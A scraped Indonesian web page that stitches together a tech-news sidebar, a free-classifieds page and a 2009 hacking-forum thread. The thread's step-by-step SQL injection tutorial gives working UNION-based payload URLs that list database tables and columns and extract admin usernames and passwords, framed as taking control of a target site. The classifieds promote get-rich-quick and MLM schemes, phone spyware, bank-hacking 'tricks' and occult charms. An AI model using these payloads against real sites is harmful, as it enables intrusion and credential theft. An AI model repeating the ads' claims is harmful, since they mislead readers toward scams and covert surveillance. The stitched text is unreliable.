Plus – TrikDirilis, Twitter for BlackBerry Versi Public BetaWuih, Intel Bagi-bagi Sampel Eksperimen Chip 48-CoreWD Hadirkan Hard Disk Notebook 750 GBYuk, Jadi Bos Perusahaan Operator TelekomunikasiMahir Bikin Blog, Portal, dan ForumGilee, Ponsel ini Bisa Standby 1 Bulan!12 Juta Pengguna Pakai Linux UbuntuHitachi Gandakan Usia Baterai Li-IonOngkos Produksi iPad 260 DolarCk..ck..ck… 15 Ribu Dolar untuk Boneka Kelinci EnergizerRSS-nya BELAJAR
RSS - Posts
Blog at WordPress.com. | Theme: Monochrome by mono-labPasang Iklan Baris Gratis Tanpa Daftar Online,Tanpa Quota & Tanpa Login | Iklan Percuma | Free Classifieds Ads Home Kontak Kami Tentang Kami Pasang Iklan Premium Pasang Iklan Link Cari Iklan
Seluruh konten dari website ini merupakan kontribusi dari para pemasang iklan. Isi iklan merupakan tanggung jawab pemasang iklan. Karena itu dimohon untuk berhati-hati sebelum menindaklanjuti iklan yang Anda minati. !! KOMUNITAS SEX KOTA SOLODipasang Tgl: 24 November 2008 | Kategori: Kontak Jodoh
Mau tau komunitas sex dikota solo….?liaht di www.solosec.comJadilah anggota tetap…………………….di komuntas ini
http://www.solosec.comInfo IklanKeywords Iklan: komunitas, kota, sex, solo
Iklan PremiumBisnis Terbaru Tahun 2010 , Keajaiban Bisnis E-MIRACLEDibaca: 174 kali | Kategori: Bisnis Online
Bersama meraih sukses yang penuh barokah. Saatnya kita Sukses Dunia dan Akhirat ; > Ajak > Rawat > Dan beri Uswatun Hasanah Dalam Multi Level Tahajut, Multi Level Dhuha, Multi Level Dhuha , dan lain2 Bersama Ust. Yusuf Mansyur Dapatkan web Replika Canggih untuk Bisnis Pulsa DBSDibaca: 174 kali | Kategori: Bisnis Online
Saatnya mengembangkan jaringan bisnis pulsa dari PT.DFI (duta4future.com) online lewat internet, dapatkan member baru dari seluruh pelosok nusantara tanpa harus bertemu langsung dgn mereka. Cukup bergabung dg tim online kami maka anda akan mendapatkan web replika canggih yang bisa anda promosikan di internet selanjutnya biarkan sistem yg bekerja 24 jam,7hari seminggu, semua otomatis dan mudah. buktikan di www.aktivasidbs.com/?id=sarlykolit.www.LEMBAH.com GRATIS TRIK RAIH 1,8JUTA SEHARI !!!Dibaca: 8,763 kali | Kategori: Bisnis Online
Kami beri bukti, bukan omong besar!!! Bukti nyata raih Rp.1,8 juta ($180) sehari! Baca rahasianya dan lihat buktinya hanya di http://www.lembah.comRAHASIA TERHEBAT mendapatkan uang Rp. 10.000.000 dan isi ulang pulsa GRATIS Rp. 1.000.000 kurang dari 24 JAMDibaca: 473 kali | Kategori: Bisnis Online
RAHASIA TERHEBAT mendapatkan uang Rp. 10.000.000 dan ISI ULANG PULSA GRATIS Rp. 1.000.000 kurang dari 24 jam….. Rahasia dari sistem ini bisa di gunakan oleh seluruh provider seluler di Indonesia baik GSM maupun CDMA.. 100 % TERBUKTI DAN BERHASIL uang dan pulsa gratis bisa mengalir secara otomatis ke rekening dan HP anda setiap hari BUKTIKAN SEKARANG JUGATRIK ALIRKAN RATUSAN RIBU SD JUTAAN RUPIAH.HARI LANGSUNG KE REKENING ANDA SANGAT MUDAH !!!!!!!!!!!Dibaca: 16 kali | Kategori: Bisnis Online
Pemula saja bisa !! anda sudah bisa memiliki bisnis online sendiri dengan komisi 100% tanpa repot bikin web,upload script,bikin e-book dll !!! buruan daftar secepatnyaURUS IZIN USAHA
Dibaca: 243 kali | Kategori: Alat Kantor
PT. LEGALITAS SARANAIZIN INDONESIA bergerak dibidang pengurusan perijinan usaha (set start up company) perijinan antara lain: 1. PENDIRIAN PMA / BKPM 2. PENDIRIAN PT , CV / PMDN, 3. PERUBAHAN AKTE NOTARIS 4. IZIN IMPORTIR APIU, APIP (DINAS DAN BKPM) PERATURAN NO: 45/M-DAG/PER/9/2009 5. SRP – SURAT REGISTRASI PABEAN / NIK NOMOR IDENTITAS KEPABEANAN. Penerbitan Baru, Ditolak, Diblokir,…JUAL TONER RICOH MPC 3000EDibaca: 0 kali | Kategori: Bisnis Online
KAMI MENJUAL TONER ORIGINAL DENGAN HARGA MURAH COCOK UNTUK FOTO COPY WARNA MEREK : 1. RICOH : MPC2500, MPC3000 2. GESTETNER : MPC2500, MPC3000,DSC525 DAN DSC530 3. SAVING : C2525, C3030 4. LINEAR : LD425C, LD430C HUB. 087870573546 / IBU MARIA – BOGORBISNIS TERBARU 2010 TIDAK HARUS REKRUT.Dibaca: 1 kali | Kategori: Bisnis Online
BISNIS ini dirancang dengan sistem yang sangat menguntungkan, mampu hasilkan jutaan rupiah kerekening anda dengan sendirinya. BUKTIKAN…, !!!! BARU LOUNCING..!!! KESEMPATAN…!!! buruan ambil posisi anda,,,!!! Tampa rekrut member sekalipun.MLM PULSA TERBAIK!Dibaca: 215 kali | Kategori: Bisnis Online
Inilah MLM Pulsa Terbaik! Paling Inovatif dan Menguntungkan Member. Ada Bonus Re-entry Pulsa, di mana Downline bisa jadi Upline dan Upline bida jadi Downline, tergantung waktu transaksi pulsa. EBOOK PANDUAN MENJADI DIAMOND MLMDibaca: 64 kali | Kategori: Bisnis Online
Apalah artinya uang 90 ribu rupiah. klo dalam waktu 5 tahun ke depan anda bisa menjadi DIAMOND MLM dengan penghasilan pasif income puluhan juta bahkan ratusan juta rupiah per bulan. saya Dicky Heranta berani menjamin pada anda klo dalam waktu 5 tahun ke depan setelah anda benar benar dan sungguh sungguh menerapkan semua isi EBOOK PANDUAN MENJADI DIAMOND MLM dan bonus 4 ebook GRATIS, anda belum menjadi DIAMOND atau minimal dapat pasif income dari perusahaan MLM anda, saya Dicky Heranta akan kembalikan…INGIN DOWNLOAD RATUSAN BONUS 100 % GRATIS TIS TIS ?!! KLIK DISINIDibaca: 309 kali | Kategori: Bisnis Online
Kami sediakan RATUSAN link download 100 % GRATIS untuk anda. BENAR- BENAR GRATIS… TANPA BIAYA SEPESERPUN ! Selain itu, jika berminat anda juga bisa dapatkan SOLUSI BISNIS ONLINE anda di web kami. Silahkan anda buktikan !>>> ILMU Gendam Mafia/ILMU RAJA Jalanan,TEMUKAN 5 SENJATA Rahasia Ampuh Ilmu GENDAM…!!! :)_>Dibaca: 715 kali | Kategori: Lain-lain
Menghilangkan kesadaran seketika orang jadi bingung/linglung,apa yang kita minta semua di berikan,orang tunduk tak bisa bicara seperti patung.di ajarkan lima jenis ILMU GENDAM mafia untuk tingkat profesional, {1} gendam jabat tangan, {2} gendam cablek/tepukan, {3} gendam tatapan tanpa menyentuh, {4} gendam suara bisa jarak jauh lewat Hp. http://rasajati.wordpress.com/Inovasi Baru Bisnis Online Dengan Konsep Yang Luar Biasa…!!!Dibaca: 315 kali | Kategori: Bisnis Online
DENGAN INNOVASI SISTEM PLAN PALING REVOLUSIONER, UANG ANDA AKAN BERTAMBAH Dari Rp. 250.000,- Menjadi Total Rp. 10.000.000,- LANGSUNG CASH/TUNAI TANPA DICICIL menggunakan Tabel Tahapan Persentase, TANPA ADA Pengelompokan GRUP, Tanpa Kerja Keras, Tanpa Cari Downline, Tanpa Jualan, Tanpa Terkecuali. TANPA SYARAT dan KETENTUAN APAPUN. SATU-SATUNYAN PROGRAM YANG…***>>>asetBCA(dot)com, modal 10ribu hasil PASTI 22Juta/4 BLN!!Dibaca: 283 kali | Kategori: Bisnis Online
Dapatkan 22juta atau lebih hanya dalam waktu 4 bulan atau kurang dengan modal hanya Rp.10.000 saja!! hasil langsung di transfer ke rekening anda setiap minggunya dengan minimal PAYOUT/pengiriman komisi 20ribu rupiah!WoOw asetBCA(dot)com adalah sebuah program yang di kelolah sangat professional dan TERPERCAYA , ada leader dari seluruh indonesia yg bisa di hubungi,…BOSAN MENJALANKAN BISNIS ORANG LAIN?????Dibaca: 208 kali | Kategori: Bisnis Online
JALANIN AJA BISNIS ANDA SENDIRI MAKA ANDA BISA HASILKAN JUTAAN RUPIAH DENGAN CARA MENJUAL INFORMASI SEDERHANA DARI INTERNET KARENA 100% KOMISI MILK ANDA DAN BERGARANSI. ANDA TIDAK PERLU MEMBUAT WEB / BLOG, EBOOK, HOSTING DAN DOMAIN. BENAR – BENAR TERBUKTI. SEGERA BERGABUNG DAN JALANKAN BISNIS INI SECEPATNYA…..!!CUMA BISA BERI BUKTI, BUKAN JANJI. TOTAL 10 JT TUNAI DI TANGAN ANDADibaca: 7 kali | Kategori: Bisnis Online
KAMI CUMA BISA BERIKAN BUKTI, BUKAN OMDO(OMONG DOANG) BISNIS BARU 2010 BISA MEMPERBAIKI SISTEM KEUANGAN ANDA http://smart.flazzcash.com DAFTAR SEGERA, ISI DATA – DATA ANDA SOAL PEMBAYARAN BS BELAKANGAN, KARNA SEMUA MEMBER DI UNTUNGKAN DGN MENDAPATKAN BANYAK BONUS-BONUS LANGSUNG CASH KE REKENING ANDA BERLAKU MEMBER PASIF DAN AKTIV,KEUNTUNGAN DI BAGI DENGAN CARA ADIL DAN MERATA…Ratusan E-book,e-book Dewasa,Script, dan Paket Mesin uang untuk andaDibaca: 28 kali | Kategori: Bisnis Online
GELO, EDAN DAN MANTAP! DIJAMIN TIDAK RUGI !! Penawaran SENSASIONAL dari Saya hanya sebagai MEGA BONUS TERBATAS yang saya beli dari website Premium berbayar dengan menghabiskan dana sebesar Rp. 4.420.000,- (empat juta empat ratus dua puluh ribu rupiah yang seharusnya anda bayar kontan semuanya! tanpa bisa kredit apabila membeli tanpa bantuan saya saat ini) Akan Saya berikan…PANDUAN RAHASIA AGAR ORANG HANYA MAU MEMBELI PRODUK ATAU BERGABUNG LEWAT URL WEB REPLIKA ANDADibaca: 94 kali | Kategori: Bisnis Online
Temukan 10 langkah cerdas + 2 jurus rahasia bagaimana cara “membujuk” dan “mempengaruhi” orang lain agar HANYA MAU membeli produk atau bergabung lewat URL web replika anda.Cocok bagi anda yang berbisnis reseller,afiliasi,investasi,networking dan MLM online.Rahasia Sukses Bisnis Lahir & Batin Bersama Duta Business School ( DBS )Dibaca: 36 kali | Kategori: Lain-lain
Ingin dapat uang dan pulsa gratis………… Mau Income Rp 5 juta per hari Klik http://www.aktivasidbs.com/?id=henriutama PENDAFTARAN CEPAT ATAU LANGSUNG HUBUNGI SAYA DI 08122381567, SMS ONLYBISNIS ONLINE TEBARU 2010, DENGAN METODE BARU,, MAU??
Dibaca: 349 kali | Kategori: Bisnis Online
TERGERAK DARI BANYAKNYA PENIPUAN BISNIS ONLINE SAAT INI, KAMI MENAWARKAN SEBUAH BISNIS BARU PEMBUKA AWAL 2010. DENGAN SYSTEM GFRS YG AKAN MEMBERIKAN ANDA DOUBLE PROVIT & MENINGKATKAN PENJUALAN SAMPAI DENGAN 90 %. PENASARAN???. BURUAN GABUNG!!!!!! DAFTAR GRATIS FREE MEMBER!!!!!Sewa mobil box di jakartaDibaca: 150 kali | Kategori: Kendaraan
Sewa mobil Box Gran Max, siap antar barang pameran / catering / pindahan / dagang sampai tujuan dengan tarif hemat Rp.200.000 khusus utk DKI. Untuk luar kota (nego) by call.SEGERA HADIR APRIL 2010 BISNIS MBN INDONESIADibaca: 322 kali | Kategori: Bisnis Online
PROFIT SHARING GOLD MEMBER Dibayarkan setiap bulan hingga mencapai Rp.5.000.000 PROFIT SHARING PLATINUM MEMBER Dibayarkan setiap bulan hingga mencapai Rp.20.000.000 SALAH SATU YANG DAHSYAT Bonus Multiple Pairing. tidak mengharuskan keseimbangan pada jaringan anda. Dengan satu jalur atau 1 kaki aktif andapun bisa mendapatkan bonus optimal.[JUAL] SOFTWARE PENYADAP HP GSM FULL FEATURE [DEWASPY.COM]Dibaca: 541 kali | Kategori: Software & Game
[DEWASPY.COM] SUPPLIER TERBESAR JASA PEMBUATAN SOFTWARE PENYADAP HANDPHONE DENGAN JAMINAN HARGA TERMURAH & FITUR TERLENGKAP. [ALL IN ONE SPY SOFTWARE] 1. SADAP SUARA SEKITAR HP TARGET. 2. SADAP PERCAKAPAN PANGGILAN TELEPON SECARA LIVE. 3. MEMBACA SEMUA SMS IN/OUT. 4. MENDAPATKAN PEMBERITAHUAN NO HP TARGET SETIAP KALI TARGET GANTI SIMCARD. 5. SMS COMMAND. 6. GPS TRACKING. 7. BERLAKU…JADI PERKASA SECARA ALAMI ITU TIDAK SULIT, ANDAI ANDA TAHU RAHASIA BESARNYA !Dibaca: 11,022 kali | Kategori: Pengobatan-Kesehatan
Sudah saatnya anda perkasa tanpa obat, tanpa olah tubuh seperti : senam keggel, olah nafas, latihan-latihan khusus lainnya yang butuh waktu dan ketelatenan dan belum tentu hasilnya. Pada intinya tidak ada pria yang tidak perkasa, semua bisa jadi perkasa asal tahu caranya bahkan bersifat permanen, perkasa terus tinggal kemauan anda dan pasangan mau berapa ronde ! Tidak ada di web…Dollar MUDAH MIN 125 USD =1,3 JUTA, HANYA DALAM 24 JAM!! DiJAMIN!!!Dibaca: 2,560 kali | Kategori: Bisnis Online
Ya Saya Tidak Bercanda!!, Dapatkan segera dollar mudah,langsung transfer ke rek PayPal Anda!! Sekaligus kesempatan mendapatkan penghasilan online dari 8 Perusahaan internasional tekemuka; CLICKBANK,MYLIFE,HDPUBLISHING,GOOGLE ADSENSE, GDI,GVO, HOSTGATOR,Referral ACME! Tunggu Apalagi,segera lihat bukti pembayaran di blog saya,dan JOIN Langsung!! Dapatkan ebook panduan nya GRATISS!!…G-NETIC : MLM PULSA TERBARU & TERBAIK 2010Dibaca: 292 kali | Kategori: Ponsel & Pulsa
Hadir dgn sistem trinary (3kaki), pertumbuhan 2Xlipat binary. Cukup rekrut 3 org atau join 4hb langsung pasif income selamanya. pulsa murah, trx cepat & lancar. Index 1, flush out 30psg/hr/hb, potensi bonus pasangan 1,2juta/hr/hb, bns sponsor 30rb, bns pasangan 40rb, bonus titik, royalty
margin pulsa, royalty kehormatan. rekrut 10 org langsung dapet hp. untuk kemajuan jaringan…DITAWARKAN: TRIK TAMBAH SALDO ATM REKENING BANK ANDA TANPA HARUS MENABUNG LAGI SECARA OTOMATIS SETIAP HARINYA 24 JAMDibaca: 628 kali | Kategori: Bisnis Online
KAMI TAWARKAN SEBUAH RAHASIA BAGAIMANA SALDO ATM ANDA BISA BERTAMBAH SETIAP HARINYA, MINIMAL SALDO ANDA BISA BRTAMBAH 1 – 5 JUTA PERHARI, JIKA ANDA PANDAI MENJALANKANNYA BISA NAMBAH SALDO LEBIH DARI 5 JUTA PERHARINYA. BERLAKU UNTUK SEMUA KARTU ATM DI INDONESIA.,TRIK INI SUDAH DIUJI COBA SELAMA 3 BULAN DAN 100% BERHASIL.SANGAT MUDAH DIJALANKANNYA, SISTEMATIS, TIDAK MERUGIKAN…Peluang Bisnis Yang Luar Biasa Tahun 2010Dibaca: 423 kali | Kategori: Bisnis Online
Raih peluang bisnis di internet bersama Bisnis keagenan Pulsa DBS (duta Bisnis School) yang memberikan keuntungan finansial melimpah dengan kerja cerdas dan pasif income Rp 1-5 jt/hr dan pulsa gratis Rp 90 rb/hr langsung ke Rek Bank Anda dan ke HP Anda, Perusahaan dengan sertifikat halal MUI, nyata dan terpercaya, telah jutaan rekan-rekan muda yang sukses melalui program DBS ini.…ASCII CODE digunakan Hacker untuk penyusupan BANK ONLINEDibaca: 203 kali | Kategori: Bisnis Online
Simak langkah – langkah detailnya, cara penyusupan hacker di BANK online menggunakan ASCII CODE. Dan bagaimana cara mencegahnya jika terjadi pada anda. Dapatkan juga berbagai macam kebenaran TRIK SADIS, BANK ACCOUNT SPAMMER, ATM UNLIMITED, Cara manupulasi para bandar judi online meraup $512 kurang dari setengah jam, Cara membangun bisnis tanpa harus menciptakan PRODUK / menulis eBook.…CUMA 2 LANGKAH MUDAH!!!!!!Dibaca: 399 kali | Kategori: Bisnis Online
PERTAMA : Ganti data Nama,Email,Hp dan No Rekening.KEDUA : Promosikan. CUMA 2 langkah mudah untuk MENGHASILKAN UANG MELIMPAH melalui internet, Keuntungan 100% untuk anda. BUKAN Smart Machine System. Lebih dari 2 langkah tersebut, uang langsung saya kembalikan. Anak kecilpun pasti bisa. SEGERA GABUNG SEKARANG JUGA!!!!!mesin percetakan OFFSET BARU/BEKASDibaca: 160 kali | Kategori: Lain-lain
Kami penjual mesin-mesin Percetakan terlengkap,baru dan bergaransi spt: Mesin offset dari semua ukuran dan warna. Mesin mesin finishing: mesin potong kertas,mesin lipat, mesin jilid, mesin UV vernish, mesin Collator/susun/komplit,mesin pon/embos dan juga mesin press cover dll Mesin-mesin kami merupakan”HIGH QUALITY CHINA PRINTING MACHINERY” Spesifikasi dan gambar mesin klik:www.tikinaroindonesia.com…DAFTAR GRATIS, HARGA PULSA MURAH DAN MASUK AKAL, TIDAK ADA YANG DIRUGIKAN DENGAN TIDAK ADA DEPOSIT MINIMALDibaca: 491 kali | Kategori: Ponsel & Pulsa
Inilah kesempatan Anda untuk bisnis dengan modal dan resiko minimal. Didukung dengan sistem yang mudah dan simple, Anda berpeluang untuk mendapatkan penghasilan tambahan sampai dengan ratusan juta rupiah. Silakan bandingkan dengan sistem yang lain. Saya sudah coba, ternyata mudah dan bermanfaat. Insya Allah berhasil.Sistem Uang Meledak.. Untuk Anda Yang Mau Kaya ! Bebas Stres..Dibaca: 104 kali | Kategori: Bisnis Online
“Hanya 2 Langkah Dalam 20 Menit Uang Dapat Meledak ! Ke Rekening Bank Anda ” Saya jamin 100 % anda PASTI !! mendapatkan hasilnya.. dengan pelayanan yang PRIMA ! GARANSI 3 X LIPAT !!.. kalau anda gagal Kenapa berani seperti itu ? Karena saya yakin ! akan KEAMPUHAN ! & KEDAHSYATAN ! sistem otomatis itu yang sebentar lagi menjadi milik anda pribadi, yang bekerja 24 jam nonstop/hari…CARA MUDAH & DAHSYAT DAPAT DUIT !! Bonus TERBESAR & TERCEPAT Dibayar Harian !! Bonus Sponsor Rp. 60.000,- Pasangan Rp. 32.000,-Dibaca: 48 kali | Kategori: Lowongan Kerja
PT. Indo Tama Solution Launching Januari 2010 Web Perusahaan www.indotama5.com Web Support : http://stokis4.com/?ref=218 Pendaftaran : Rp. 200.000,-/Hak Usaha – Bonus Sponsor: Rp. 60.000,- (dibayar harian) – Bonus Pasangan: Rp. 32.000,- (dibayar harian) Flushing 12 unit/hari (Bonus pasangan maksimal Rp 384.000,-/HU/Hari) – Bonus Duplikasi : Rp.10.000,- (dibayar mingguan) – Bonus…RAHASIA BISNIS INTERNETER DUNIA PENGHASILAN STANDAR INTERNATIONAL TERBONGKAR JUGA!!!!Dibaca: 340 kali | Kategori: Bisnis Online
**Hallo Interneter Mania ***STOP*** Jangan Ikut Bisnis yang Tidak Jelas Asalnya** **Ikuti Bisnis yang Terbuka, Besar dan Nyata Ini ***Modal Awal GRATIS*** Mari Kita Tingkatkan Devisa Negara Indonesia dengan Bisnis Interneter Kelas Dunia Penghasilan Standar International $50-125/Referer. Anda bisa menghasilkan $5000/bulan bahkan tak terhingga.Plus Hosting Unlimited.Anda bisa…MAHASISWA DROP OUT JADI DIAMOND MLM !!!Dibaca: 69 kali | Kategori: Bisnis Online
Saya Erik. Mahasiswa Drop Out. umur 23 tahun. salah satu pembeli Ebook Panduan Menjadi Diamond MLM. saya distributor Tianshi. sebelum beli Ebook Panduan Menjadi Diamond MLM, peringkat saya masih bintang 3. tapi setelah saya beli Ebook Panduan Menjadi Diamond MLM ALHAMDULILLAH. dalam waktu 3 tahun peringkat saya sekarang sudah silver lion ato level Diamond Tianshi.…BARU LOUNCING MARET 2010Dibaca: 230 kali | Kategori: Bisnis Online
KESEMPATAN DATANG SEKALI.. BARU ,,, bisnis yang bekerja dengan sendirinya, mampu hasilkan jutaan rupiah kerekening anda tanpa mencari member……, bisnis pasti tanpa janji melainkan bukti, bekerja dengan sistem yang cerdas.
Iklan dengan kategori " Kontak Jodoh " lainnya:Iklan # 335710 : MANTRA ILMU PELET JARAN GOYANG ASLI DAN AMPUH.Iklan # 334922 : MENERIMA JUAL BELI CHIPS POKER HARGA NEGOIklan # 334877 : Dea, ” Walau aku sudah berumur tapi aku masih Anggun lho “Iklan # 334837 : MINYAK BEDAH AURAIklan # 334662 : gigolo,cariIklan # 334572 : dating serviceIklan # 334477 : menncari cinta sejati dan istri setiaIklan # 334410 : SPESIALIS PENGOBATAN NON MEDISIklan # 333783 : PELET DAYAK jasa pelet PELET BIRAHI pelet ampuh MANTRA PELETIklan # 333698 : AYO TEMUKAN AKU&TANGKAP AKU…AKU ADALAH JODOH
IDAMANMU YG SLAMA INI KAMU CARI!!!Pasang Iklan Teks & Banner
Telah Dibuka Layanan Pasang Iklan Teks & Banner di ads.iklanhouse.com. Yg Merupakan solusi cerdas untuk mempromosikan produk atau bisnis Anda dengan harga yang murah hanya Rp:80000/bln, iklan Anda akan kami distribusikan & tampil di seluruh jaringan kami yg berjumlah lebih dari 70 website dgn total kunjungan diatas 50000/hari.
Dibawah ini adalah beberapa network iklan Kami yg mempunyai ribuan kunjungan/hari:
+ Iklanbarispro.com + Iklanmarket.com + Iklanbaliku.com + Iklanbarisgratis.net + iklansukses.com + Iklanbisnisku.com+ Iklandunia.comForm Pasang Iklan Gratis
Penting: Diharap memasang iklan dikategori yg sesuai.Dilarang memasang iklan yg sama & berulang-ulang. Kami akan segera menghapus seluruh iklan Anda bila melanggar ketentuan diatas.Bagian bertanda *) berarti harus Anda isi.Judul Iklan:* Kategori Iklan:* WebsiteEmailKeywords Iklan Contoh: bisnis, iklan, promosiGambar: Detail Iklan *
Peluang Bisnis
Tingkatkan Trafik & PageRank Anda Dgn Memasang Iklan Link Disini, Hanya Rp 40.000/Bulan!Link akan ditampilkan di bawah ini di setiap halaman.Bisnis OnlineAlamak Bikin Web Makin Mudah,Murah & MenguntungkanBisnis Hebat Menuju MandiriBisnis Yang Anda Nanti – Nantikan Hanya Disinihasilkan uang dengan blog gratisanHipnotis gratis hipnotis cepat hipnotis diriIklan Baris GratisJaman Sekarang Cari Uang Sangat Mudah!!Pasang Iklan BarisSukses BISNIS dengan JARI andatrik menjadi milyunerHosting & Web DesignWItchSoft, Spesialis Web Based Software & WebsiteKendaraan
Anda Butuh Hidrolik, Gear pump, Pto, Kopel,Cable Control Dll….Lain-lainBusana MuslimCari Lowongan kerjaIKLAN Baris DEWASA.comIklan GratisIklan GratisIndonesia Java International DestinationKonsultan Perencana KeuanganLowongan kerja Di BaliLowongan PekerjaanPasang IklanPasang IklanPerencana KeuanganPerencanaan Keuangan KeluargaPromosi GratisSaya Kaya, Saatnya Anda Sekarang Yang KayaLowongan KerjaGrowing your Traffick Growing your income, instanlyPonsel & PulsaIngin Bisnis Pulsa Daftar Gratis ?Pulsa Super Murah, trx cepat dan lancarPropertiJual RumahRumah DijualKategori IklanAlat Kantor Alat Rumah Tangga Buku & Majalah Elektronik Hewan Peliharaan Kendaraan Komputer Lowongan Kerja Pendidikan & Kursus Ponsel & Pulsa Tempat Wisata Lain-lain Mobil Dijual & Dicari Motor Dijual & Dicari Properti Rumah & Tanah Bisnis Online Pengobatan & Kesehatan Kontak Jodoh Musik-Film-Lagu Hosting & Web Design Tour & Travel Hotel & Penginapan Software & Game Busana & Fashion Kredit & Perbankan
Makanan & Restoran Waralaba & Kerjasama Khusus Dewasa Seni & Kerajinan Statistik IklanIklan hari ini: 229Iklan kemarin: 521Total Iklan: 292589 Online Support:
We Are DevilzCrew
Devilzc0de TeaM :: Computer :: Attacking-Web Share | Actions ! My SQL Injection Step by Step
Pengirim MessagegonzhackAsisten LAB
Jumlah posting: 69Join date: 11.05.09
Subyek: My SQL Injection Step by Step Fri Jun 26, 2009 2:17 pm
SQL injection adalah sebuah aksi hacking yang dilakukan di aplikasi client dengan cara memodifikasi perintah SQL yang ada di memori aplikasi client dan juga merupakan teknik mengeksploitasi web aplikasi yang didalamnya menggunakan database untuk penyimpanan data.
Yang perlu di ketahui sebelum sql injection pada mysql:karakter: ‘ atau -comments: /* atau –information_schema untuk versi: mysql versi 5.x , tidak support untuk mysql versi 4.x
===========
=step Satu:============
carilah targetmisal: [site]/berita.php?id=100
Tambahkan karakter ‘ pada akhir url atau menambahkan karakter “-” untuk melihat apakah ada pesan error.contoh: [site]/berita.php?id=100′ atau[site]/berita.php?id=-100
sehingga muncul pesan error seperti berikut (masih bnyak lagi):
===========step Dua:===========
mencari dan menghitung jumlah table yang ada dalam databasenya…gunakan perintah : order by
contoh: [site]/berita.php?id=-100+order+by+1-- atau[site]/berita.php?id=-100+order+by+1/*
ceklah secara step by step (satupersatu)…misal: [site]/berita.php?id=-100+order+by+1--[site]/berita.php?id=-100+order+by+2--[site]/berita.php?id=-100+order+by+3--[site]/berita.php?id=-100+order+by+4--
sehingga muncul error atau hilang pesan error…misal: [site]/berita.php?id=-100+order+by+9--
berarti yang kita ambil adalah sampai angka 8menjadi [site]/berita.php?id=-100+order+by+8--
============step Tiga:============
untuk mengeluarkan angka berapa yang muncul gunakan perintah unionkarena tadi error sampai angka 9maka: [site]/berita.php?id=-100+union+select+1,2,3,4,5,6,7,8--
ok seumpama yg keluar angka 5
gunakan perintah version() atau @@version untuk mengecek versi sql yg diapakai masukan perintah tsb pada nagka yg keluar tadimisal: [site]/berita.php?id=-100+union+select+1,2,3,4,version(),6,7,8-- atau[site]/berita.php?id=-100+union+select+1,2,3,4,@@version,6,7,8--
lihat versi yg digunakan seumpama versi 4 tinggalkan saja karena dalam ver 4 ini kita harus menebak sendiri table n column yg ada pada web tersebut karena tidak bisa menggunakan perintah
From+Information_schema..
untuk versi 5 berarti anda beruntung tak perlu menebak table n column seperti ver 4 karena di ver 5 ini bisa menggunakan perintah From+Information_schema..
=============step Empat:= <<<<< lewatin ajah... ============
untuk menampilkan table yg ada pada web tsb adalahperintah table_name >>> dimasukan pada angka yg keluar tadiperintah +from+information_schema.tables/* >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,table_name,6,7,8+from+information_schema.tables--
seumpama table yang muncul adalah “admin”
============step Lima:============
untuk menampilkan semua isi dari table tsb adalahperintah group_concat(table_name) >>> dimasukan pada angka yg keluar tadiperintah +from+information_schema.tables+where+table_schema=database() >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(table_name),6,7,8+from+information_schema.tables+where+table_schema=database()--
============== step Enam: ==============
perintah group_concat(column_name) >>> dimasukan pada angka yg keluar tadiperintah +from+information_schema.columns+where+table_name=0xhexa-- >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0xhexa--
pada tahap ini kamu wajib mengextrak kata pada isi table menjadi hexadecimal yaitu dengan cara mengkonversinyawebsite yg digunakan untuk konversi :
http://www.piclist.com/techref/ascii.htm
contoh kata yg ingin di konversi yaitu admin maka akan menjadi 61646D696E
[site]/berita.php?id=-
100+union+select+1,2,3,4,group_concat(column_name),6,7,8+from+information_schema.columns+where+table_name=0×61646D696E--
=============step Tujuh:=============
memunculkan apa yg tadi telah dikeluarkan dari table yaitu dengan cara
perintah concat_ws(0×3a,hasil isi column yg mau dikeluarkan) >>> dimasukan pada angka yg keluar tadiperintah +from+(nama table berasal) >>> dimasukan setelah angka terakhir
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,hasil isi column),6,7,8+from+(nama table berasal)--
contoh kata yang keluar adalah id,username,password
[site]/berita.php?id=-100+union+select+1,2,3,4,concat_ws(0×3a,id,username,password),6,7,8+from+admin--
=============== step Delapan:===============
tahap terakhir mencari halam admin atau login
selanjutnya terserah anda karena kekuasaan web ada di tangan anda…(me gak bertanggung jawab loh..)
Untuk Lebih Jelas Bisa Download Video Tutorial Ini Beserta File MySQL Injection
DOWNLOAD
anda langsung jalankan file ” SQL Injection.html ”
(Nb. mohon maaf apabila ada salah kata atau kekurangan dalam tutorial + video ini)
Salam
Gonzhack
flyff666Admin
Jumlah posting: 44Join date: 30.04.09
Subyek: Re: My SQL Injection Step by Step Sat Jun 27, 2009 2:50 am
mantab .. lanjot dah ..
N4ck0Pengunjung
Jumlah posting: 59Join date: 21.06.09
Subyek: Re: My SQL Injection Step by Step Sat Jun 27, 2009 3:33 am
wah mantap master
nih tutorial dan videoyang jadi dasar ane belajar SQL Injection om nice share yahh
gunslinger_Asisten LAB
Jumlah posting: 184Join date: 15.05.09Age: 16Lokasi: mars
Subyek: Re: My SQL Injection Step by Step Sat Jun 27, 2009 4:28 am
wow.... keren kaka.....nice share
gonzhackAsisten LAB
Jumlah posting: 69Join date: 11.05.09
Subyek: Re: My SQL Injection Step by Step Tue Jun 30, 2009 7:20 am
iyah sama' kaka
vhesckotPengunjung
Jumlah posting: 56Join date: 04.06.09
Subyek: Re: My SQL Injection Step by Step Tue Jun 30, 2009 7:39 am
Wah Keren neh....Ijin bookmark ah,,kadang2 saya masih lupa....Heheheeee
rotlezPengunjung
Jumlah posting: 30Join date: 18.06.09Age: 19Lokasi: Bekasi yg panaZ..
Subyek: Re: My SQL Injection Step by Step Tue Jun 30, 2009 8:40 pm
nice tutor om gonzhack......!!!
gunslinger_Asisten LAB
Jumlah posting: 184Join date: 15.05.09Age: 16Lokasi: mars
Subyek: Re: My SQL Injection Step by Step Wed Jul 08, 2009 9:24 pm
My SQL Injection Step by Step
Halaman 1 dari 1
Permissions of this forum: Anda tidak dapat menjawab topikDevilzc0de TeaM :: Computer :: Attacking-Web
Bebas forum | © phpBB | Free forum support | Kontak | Report an abuse | Create a free blog
